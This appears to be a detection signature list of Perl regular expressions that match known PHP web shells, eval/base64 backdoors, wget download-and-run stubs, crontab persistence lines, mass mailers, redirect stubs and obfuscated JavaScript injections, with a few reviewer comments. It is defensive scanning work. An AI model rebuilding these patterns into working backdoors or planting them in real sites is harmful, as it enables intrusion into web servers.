qr/<\?php eval\(chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(.+?\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\); \?>/is,
qr/preg_replace\(\"\\x2f.+?\\x3d\"\);/is,
qr/<\?php\s+\@ini_set\(.+?function wp_cd\(\$fd, \$fa=\"\"\).+?\$npDcheckClassBgp = \"([A-z0-9]{1,20})\";\s+\}\s+\?>/is,
qr/<\?php \/\* WARNING:.+?;eval\(base64_decode\(.+?\)\);return;\?>/is,
qr/<\?php\s+\@eval\(base64_decode\(.+?\)\);\s+\?>/is,
qr/([A-z0-9]{1,20}) <\?php\s+if\(\@md5\(\$_POST\[\"gif\"\]\) === \"([A-z0-9]{20,})\"\) \{\s+eval \(base64_decode\(\$_POST\[\"php\"\]\)\);\s+exit;\s+\}\s+\?>/is,
qr/<\?eval\(stripslashes\(array_pop\(\$_POST\)\)\)\?>/is,
qr/<\?php.+?function writerss\(\$name,\$text\) \{ echo \"<\"\.base64_encode\(\$name\)\.\">\"\.base64_encode\(\$text\)\.\"<\/\"\.base64_encode\(\$name\)\.\">\\n\"; \}.+?<\/output><\/channel><\/rss>\";\s+\?>/is,
qr/<\?php echo base64_decode\(.+?\@include\(\"http\:\/\/.+?\); \?>/is,
qr/<\?\s+require\(\"\.\.\/includes\/configure\.php\"\);.+?echo \"WORK\";.+?mysql_close\(\$link\);\s+unlink\(\"([A-z0-9]{1,20})\.php\"\);\s+\?>/is,
qr/<\?php include\(\"http:\/\/.+?\"\); \?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'code\'\]\)\) \{\s+if \(\$_POST\[\'code\'\]\!=\"\"\) \{\s+eval\(stripslashes\(\$_POST\[code\]\)\);\s+exit;\s+\}\s+\}\s+echo \"([A-z0-9]{1,20})\";\s+\?>/is,
qr/<\?php \@passthru\(\"cd \/tmp;wget http:\/\/.+?\); \?>/is,
qr/<\?php \$x\w\w=\"\\x65.+?\);if\(isset\(\$_POST\[.+?\}else\{\@\$x\w\w\(\$_POST\[.+?\]\);\}\?>/is,
qr/<\?.+?preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3b\",\"\.\"\);/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"eval\(gzinflate\(base64_decode\(.+?\)\)\);\",\"\"\); \?>/is,
qr/<\?php if \(isset\(\$_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\) eval\(stripslashes\(\$_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\); \?>/is,
qr/<\?php \$firewall = true; \$stew = error_reporting\(\).+?if \(\$firewall\)\{header\(\"horrible:1\"\);\} echo \"attack_queue\";\} \}/is,
qr/<\?php.+?\|\| InboX Mass Mailer \|\|.+?<script>alert\(\'Mail sending complete.+?<\/html>/is,
qr/<\?php\s+\/\/Starting.+?if \(\$surl_autofill_include and \!\$_REQUEST\[\"c99sh_surl\"\]\).+?c99shexit\(\); \?>/is,
qr/<\?php\s+\/\*\s+b374k.+?\$b374k=\@\$.+?\);\?>/is,
qr/<\?php\s+\$auth_pass.+?\$noname.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\$noname\)\)\)\)\);/is,
qr/if\(isset\(\$_REQUEST\[\'sort\'\]\)\)\{\s+\$string = \$_REQUEST\[\'sort\'\];\s+\$array_name = \'\';\s+\$alphabet =.+?strrev\(\"noi\"\.\"tcnuf\"\.\"_eta\"\.\"erc\"\);.+?\$\w\(\);\s+exit\(\);\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = true;\$([A-z0-9_]{1,20}) = true;\$([A-z0-9_]{1,20}) = false.+?\$([A-z0-9_]{1,20}) = \"([A-z0-9_]{1,20})\";\$([A-z0-9_]{1,20}) = \"\";\$([A-z0-9_]{1,20}) = ([0-9]{1,20}); \?>/is,
qr/<\?php\s+\$\w\d\d=.+?if \(\!empty\(\$GLOBALS\[.+?\]\)\) \{ eval\(\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\'([A-z0-9_]{1,20})\'\]\); \} \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\(\$\w\d\d\[\d\d\]\.\$\w\d\d\[\d\d\]\.\$.+?\.\$\w\d\d\[\d\d\]\.\$\w\d\d\[\d\d\];/is,
qr/<\?php.+?EMelCo PHP WebShell.+?return \$salida;\s+\}\s+\?>/is,
qr/<\?php.+?\$shell = \'uname -a; w; id; \/bin\/sh -i\';.+?if \(\!\$daemon\) \{.+?\?>/is,
qr/<\?php.+?header\(\'WWW-Authenticate: Basic realm=\"r57shell\"\'\);.+?echo \'<\/body><\/html>\';\s+\?>/is,
qr/<\?.+?Mass Mailer.+?by KoOl.+?\?>\s+<\/span>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\/\$usuario=\'\';\s+\/\/\$contraseсa=\'\';\s+eval\(gzinflate\(base64_decode\(.+?\)\)\);\?>/is,
qr/<\?php.+?\$ea = \'_shaesx_\'; \$ay = \'get_data_ya\'; \$ae = \'decode\'; \$ea = str_replace\(\'_sha\', \'bas\', \$ea\); \$ao = \'wp_cd\'; \$ee = \$ea\.\$ae; \$oa = str_replace\(\'sx\', \'64\', \$ee\); \$algo = \'md5\';.+?function wp_cd\(\$fd, \$fa=\"\"\).+?\)\)\&\& \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\(\$([A-z0-9_]{1,20})\)\)\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\(\$([A-z0-9_]{1,20})\);\}/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"\\x70\\x72\\x65\\x67\\x5f\\x72\\x65\\x70\\x6c\\x61\\x63\\x65\";\$([A-z0-9_]{1,20})\(\"\\x7c\\x2e\\x7c\\x65\",\"\\x65\\x76\\x61\\x6c\\x28\\x27\\x65\\x76\\x61\\x6c\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x22.+?\\x22\\x29\\x29\\x3b\\x27\\x29\",\'\.\'\);\?>/is,
qr/<\?php\s+\$url = base64_decode\(\$_SERVER\[\'QUERY_STRING\'\]\);.+?\$out \.= \"Connection: Close\\r\\n\\r\\n\";.+?\?>/is,
qr/<\?php.+?if \(\!function_exists\(\'exec\'\) or ini_get\(\'safe_mode\'\)\) \{ die \(\"STOP\. No available functions\.\"\); \}\s+\$bashcheck = \'\s+echo \$\(whoami\).+?unlink\(\'([A-z0-9_]{1,20})\.php\'\);\s+\?>/is,
qr/<\?php ignore_user_abort\(1\);set_time_limit\(0\);file_put_contents\(\"\/tmp\/.+?\"\)\); \@shell_exec\(\"perl.+?\?>/is,
qr/<\?php ignore_user_abort\(1\);set_time_limit\(0\);if\(move_uploaded_file\(\$_FILES\[.+?<\/form>\';\?>/is,
qr/<\?php \@shell_exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php system\(\$_SERVER\[\"HTTP_SHELL\"\]\);shell_exec\(\$_SERVER\[\"HTTP_SHELL\"\]\);passthru\(\$_SERVER\[\"HTTP_SHELL\"\]\);\?>/is,
qr/<\?php echo base64_decode\(.+?\); include\(\"http:\/\/.+?\?>/is,
qr/<\?php \@include\(\"http:\/\/.+?\/r57\.v?\"\); \?>/is,
qr/<\?php \@include\(\$_GET\[\"([A-z0-9_]{1,20})\"\]\); echo \"<b>\" \. md5\(\"([A-z0-9_]{1,20})\"\) \. \"<\/b><br>Love Hack WORLD :\]\"; \?>/is,
qr/<\?php passthru\(\"wget http:\/\/.+?\?>/is,
qr/<\? \@shell_exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php \$to = \"misterxgoofy\@hotmail\.com\";\s+\$subject = \"Exploited\";.+?echo\(\"<p>Message delivery failed\.\.\.<\/p>\"\);\s+\}; \?>/is,
qr/<\?php\s+\$filecontents=\'<\?php if\(stristr\(\$_SERVER\[\\\'HTTP_USER_AGENT\\\'\],\\\'google\\\'\)\)\{.+?\$filecontents",FILE_APPEND\);.+?\?>/is,
qr/<\?php \@passthru\(\"cd \/tmp; wget http:\/\/+?\?>/is,
qr/<\?php exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php+?elseif\(function_exists\(\"passthru\"\)\)\{.+?fclose\(\$handle\);.+?echo ex\(\"cd \/dev\/shm;rm -rf ([A-z0-9_]{1,20})\.txt\"\);\s+\?>/is,
qr/<\?php.+?if \(isset\(\$_GET\[\"cookie\"\]\)\) \{ echo \'cookie=4\'; if \(isset\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\) \@eval\(base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\); exit; \}.+?\?>/is,
qr/<\? \/\*\*\/eval\(base64_decode\(\'aWYo.+?\)\); \?>/is,
qr/<\?php \/\*\*\/eval\(base64_decode\(\'aWYo.+?\'\)\); \?>/is,
qr/<html>.+?aDriv4 Here \^\^.+?echo \"<center>Copyright \&copy; \"\.date\(\"Y\"\)\.\".+?\?>\s+<\/html>/is,
qr/<\?php\s+error_reporting\(.+?echo \"DisablePHP=\"\.\$disable_functions; print \"\\n\";.+?\}\} \} \?>/is,
qr/GIF89a \w<\?php \@copy\(\$_FILES\[file\]\[tmp_name\], \$_FILES\[file\]\[name\]\); exit; \?>/is,
qr/<FORM ENCTYPE=\"multipart\/form-data\" METHOD=\"POST\">\s+<title>Uploader <\/title>.+?<INPUT TYPE=\"submit\" VALUE=\"Send\">\s+\<\/FORM>/is,
qr/<\?php if \(isset\(\$_GET\[([A-z0-9_]{1,20})\]\)\) \{preg_replace\(\"\\x2F.+?\\x3B\",\"\\x2E\"\);\}\?>/is,
qr/GIF([A-z0-9_]{1,20})\s+<\?php\s+if\( file_exists\(\$_FILES\[\"uploadfile\"\]\[\"tmp_name\"\]\) \).+?<INPUT TYPE=\"submit\" VALUE=\"Send\">\s+<\/FORM>/is,
qr/<\?php.+?W3LL M!N! SH3LL.+?\/\/ World.+?return \$info;\s+\}\s+\?>/is,
qr/<\?php.+?\$License = \"([A-z0-9_]{20,})\";.+?\$wpplugin_action = \'WPcheckInstall\';.+?header\(\'HTTP\/1\.0 404 Not Found\'\);\s+exit;/is,
qr/<\?.+?Loader\'z WEB Shell v.+?Coded by Loader and Modify By Zetha\s+<\/center><\/td>\s+<\/tr>\s+<\/table>/is,
qr/<\?php\s+echo \'\$Word\'\.\'Press !\';\s+if \(isset\(\$_POST\[\"wp\"\]\)\) \{\s+\$wp = \$_POST\[\"wp\"\];\s+if \(get_magic_quotes_gpc\(\)\) \$wp=stripslashes\(\$wp\);\s+file_put_contents\(\$_SERVER\[\"SCRIPT_FILENAME\"\],\'<\?php \'\.\$wp\.\' \?>\'\); \}\s+\?>/is,
qr/<\?php if \(isset\(\$_POST\[\"code\"\]\)\) eval\(base64_decode\(\$_POST\[\"code\"\]\)\); \?>/is,
qr/<\?php\s+echo \"\[!\]start\\n\";.+?function make_great_htaccess\(\$path\).+?echo \"\[-\] cant get the MHB client\\n\";\s+\}\s+\}/is,
qr/<\?php eval \(base64_decode \(\"aWY.+?\"\)\); \?>/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'cmd\'\]\)\) \{\s+eval\(base64_decode\(\$_REQUEST\[\'cmd\'\]\)\);\s+\}\s+\?>/is,
qr/<\?php\s+\/\* Authorization \*\/\s+\$passwordhash = \"([A-z0-9_]{20,})\";.+?if \(isset\(\$_COOKIE\[\'wp_defined\'\]\)\) \{.+?function pnotice \(\$str\) \{.+?<\?php\s+return;\s+\}\s+\?>/is,
qr/<\?php \$cookey = \"([A-z0-9_]{1,20})\"; \?>/is,
qr/<\?php\s+if \(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\) \{\s+file_put_contents\(\'([A-z0-9_]{1,20})\.php\', base64_decode\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\), LOCK_EX\);\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,10}) = \$_SERVER\[\'HTTP_USER_AGENT\'\];\s+\$keywordsRegex = \"\/([A-z0-9_]{20,})\/i\";\s+if \(preg_match\(\$keywordsRegex, \$([A-z0-9_]{1,10})\)\) \{\s+\$\w=\'bas\'\.\'e6\'\.\'4_d\'\.\'ecode\';eval\(\$\w\(.+?\)\);\s+\}\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,10})=\"ba\"\.\"se\"\.\"64_d\"\.\"ecode\";eval\(\$([A-z0-9_]{1,10})\(.+?\)\);\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,10}) = \$_SERVER\[\'HTTP_USER_AGENT\'\];\s+\$keywordsRegex = \"\/([A-z0-9_]{20,})\/i\";\s+if \(preg_match\(\$keywordsRegex, \$([A-z0-9_]{1,10})\)\) \{.+?echo \'<\/form>\';\s+exit\(\);\s+\}\s+\?>/is,
qr/<\?php if\(!class_exists\(.+?public \$ip_list_bing=array\(\"191\.232\.\*\".+?init\(\$ruri,\$host,\$is_bot\);\} \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = str_split\(rawurldecode\(str_rot13\(\$([A-z0-9_]{1,20})\)\)\).+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\[\$([A-z0-9_]{1,20})\] \. \"\/\" \. substr\(md5\(time\(\)\).+?exit\(\);\}\}\}/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$\{\"_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w=\/\*([A-z0-9_]{1,20})\*\/\"pr\"\.\"eg\"\.\"_r\"\.\"ep\"\.\"la\"\.\"ce\";\$\w\(\'\/\/e\',\$\{\"_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\}/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/\$\w=\"assert\";\/\*([A-z0-9_]{1,20})\*\/\$\w=\$\w\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\} \/\/([A-z0-9_]{1,20})\s+if \(!extension_loaded\(\'IonCube_loader\'\)\).+?administrator\.\'\);return 0;\s+\?>\s+([A-z0-9_]{50,})/is,
qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\} \@eval\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>/is,
qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\} if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?= \"\";.+?Berandal Shell.+?<form method=\"post\">\s+<input type=\"password\" name=\"pass\">\s+<\/form><\/center>/is,
qr/<\?php\s+\$to\s+= stripslashes\(\$_POST\[\"to_address\"\]\);.+?\'error : \'\.\$result;\s+\}\s+\?>/is,
qr/<\?php\s+echo \'good\';\s+echo \'<meta http-equiv=\"refresh\" content=\"0; url=http:\/\/.+?\" \/>\';\s+\?>/is,
qr/<\?php mail\(\'.+?\', \'MIME-Version: 1\.0.+?\'\);class DeleteOnExit \{function __destruct\(\)\{unlink\(__FILE__\);\}\}\$g_delete_on_exit = new DeleteOnExit\(\);echo \'good\';\?>/is,
qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\)\).+?\}function randStringfrpernames\(\).+?\}return\$([A-z0-9_]{1,30});\};\s+\?>/is,
qr/<\?php ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?\)\{\$([A-z0-9_]{1,20})=gzcompress\(base64_encode\(urlencode\(\$([A-z0-9_]{1,20})\)\),\d\);return urlencode\(\$([A-z0-9_]{1,20})\);\};\?>/is,
qr/<\?php \/\* ([A-z0-9_]{10,}) \*\/ \?><\?php\s+error_reporting\(E_ALL\);\$DOMAIN_FNAME1_([A-z0-9_]{1,10})=\'\.SIc7CYwgY\';\$DOMAIN_FNAME2_([A-z0-9_]{1,10})=\'\/var\/tmp\/\.SIc7CYwgY\';if\(isset\(\$_POST\[.+?\$str=enc\(\$str\);fwrite\(\$file,\$str\);fclose\(\$file\);\}\?>\s+<\?php \/\* ([A-z0-9_]{10,}) \*\/ \?>/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"eval\(gzinflate\(base64_decode\(.+?\)\)\);\",\"\.\"\);exit;\?>/is,
qr/<\?php.+?\$url = \".+?\";\s+\}\s+header\(\"Location: http:\/\/\$url\"\);\s+echo \"<meta http-equiv=\\\"content-type\\\" content=\\\"text\/html; charset=UTF-8\\\">\\n\";\s+echo \"<html><head><meta http-equiv=\\\"refresh\\\" content=\\\"0;url=http:\/\/\$url\\\"><\/head><\/html>\";\s+\?>/is,
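# Meta-refresh "Loading..." page that also writes a tracking <img> through document.write().
# The two '+' of the JavaScript concatenation are escaped: left bare, ' +' is a quantifier
# ("one or more spaces"), so the entry could not match the literal text  "<img src='" + l + "'>".
qr/<html>\s+<head>\s+<meta http-equiv=\"refresh\" content=\"1; url=http:\/\/.+?document\.write\(\"<img src=\'\" \+ l \+ \"\'>\"\);\s+<\/script>\s+<body>\s+<h1>Loading\.\.\.<\/h1>\s+<\/body>\s+<\/html>/is,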
# Redirect stub: a PHP block that opens with header("Location: http://...") and ends in die().
# NOTE(review): nothing in this shape is obfuscated, so a hand-written redirect file looks the
# same; under /s the lazy .+? also crosses newlines up to the first  "); die(); ?>  that follows.
# What happens to a hit (report or strip) is decided outside this list - confirm before
# running this entry unattended.
qr/<\?php\s+header\(\"Location: http:\/\/.+?\"\);\s+die\(\);\s+\?>/is,
qr/<\?php\s+eval \( base64_decode \(\".+?\) \); \?>\s+<!--([A-z0-9_]{20,})-->/is,
qr/<\?php.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);\s+\?>/is,
qr/<\?php\s+\$this->zipname = \$p_zipname.+?\$archive = new PclZip\(\"([A-z0-9_]{1,20})\.zip\"\);.+?\@unlink\(\"([A-z0-9_]{1,20})\.zip\"\);\s+die\(\"([0-9]{1,20})\"\);\s+\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) && \@\$catch\(stripslashes\(\$user\)\) && exit;.+?function ([A-z0-9_]{1,20})\(\)\{\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{20,})\";\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{20,})\";\s+return \"\{\$([A-z0-9_]{1,20})\}\{\$([A-z0-9_]{1,20})\}\";\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = basename\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/trim\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/preg_replace\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/rawurldecode\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\".+?\"\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/, \'\', __FILE__\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/;\$([A-z0-9_]{1,20}) =.+?%([A-z0-9_]{1,20})\Z/is,
qr/<\?php extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit; extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\}\?>/is,
qr/<\?php\s+\(\$([A-z0-9_]{1,20}) = \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/([A-z0-9_]{1,20})\/e\',\'\@\'\.str_rot13\(\'riny\'\)\.\'\(\$([A-z0-9_]{1,20})\)\', \'([A-z0-9_]{1,20})\'\);\s+\?>/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if \(isset\(\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w=\"ass\"\.\"ert\";\$\w\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\/\*([A-z0-9_]{1,20})\*\//is,
qr/<\?php if\(isset\(\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w\/\*([A-z0-9_]{1,20})\*\/=\"pre\"\.\"g_r\"\.\"epl\"\.\"ace\";\$\w\(\'\/\/e\'\,\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}/is,
qr/ \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\/\*([A-z0-9_]{1,20})\*\/\$\w=\"as\"\.\"se\"\.\"rt\";\/\*([A-z0-9_]{1,20})\*\/\$\w=\$\w\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/ extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"preg_repl\"\.\"ace\";\/\*([A-z0-9_]{1,20})\*\/\$\w\(\'\/\/e\',\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\}/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"ass\"\.\"ert\";\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\} if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/=\"asse\"\.\"rt\";\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(!empty\(\$_GET\[\'image\'\]\) && \$_GET\[\'image\'\] = \'image\'\) \{\s+if\(isset\(\$_POST\[\'Submit\'\]\)\)\{.+?\@move_uploaded_file\(\$tmp, \$path\);.+?<input type=\"Submit\" name=\"Submit\" value=\"Submit\"><\/form>\s+<\?php\s+\}\s+\}/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w\.\$\w\.\$\w;\}\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"bas\\x656\\x34\\x5fd\";\$([A-z0-9_]{1,20}) = \"\\x29\)\)\\x3B\".+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+if \(\$_GET \[\'([A-z0-9_]{1,20})\'\]\) \{\s+echo \"OK\";\s+exit \(\);\s+\}\s+if\(\$_POST\[\'to\'\]\)\s+\{\s+\$to = \$_POST \[\'to\'\];.+?header \( \"Location: http:\/\/\{\$link\}\" \);\s+\}/is,
qr/<script type=\"text\/javascript\">var _0x2515=\[\"\",\"\\x.+?\\x65\"\];document\[_0x2515\[5\]\].+?\(_0x2515\[0\]\)\);<\/script>/is,
